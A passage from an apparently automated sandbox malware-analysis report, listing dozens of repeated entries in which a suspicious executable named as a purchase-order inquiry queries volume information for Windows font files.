        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
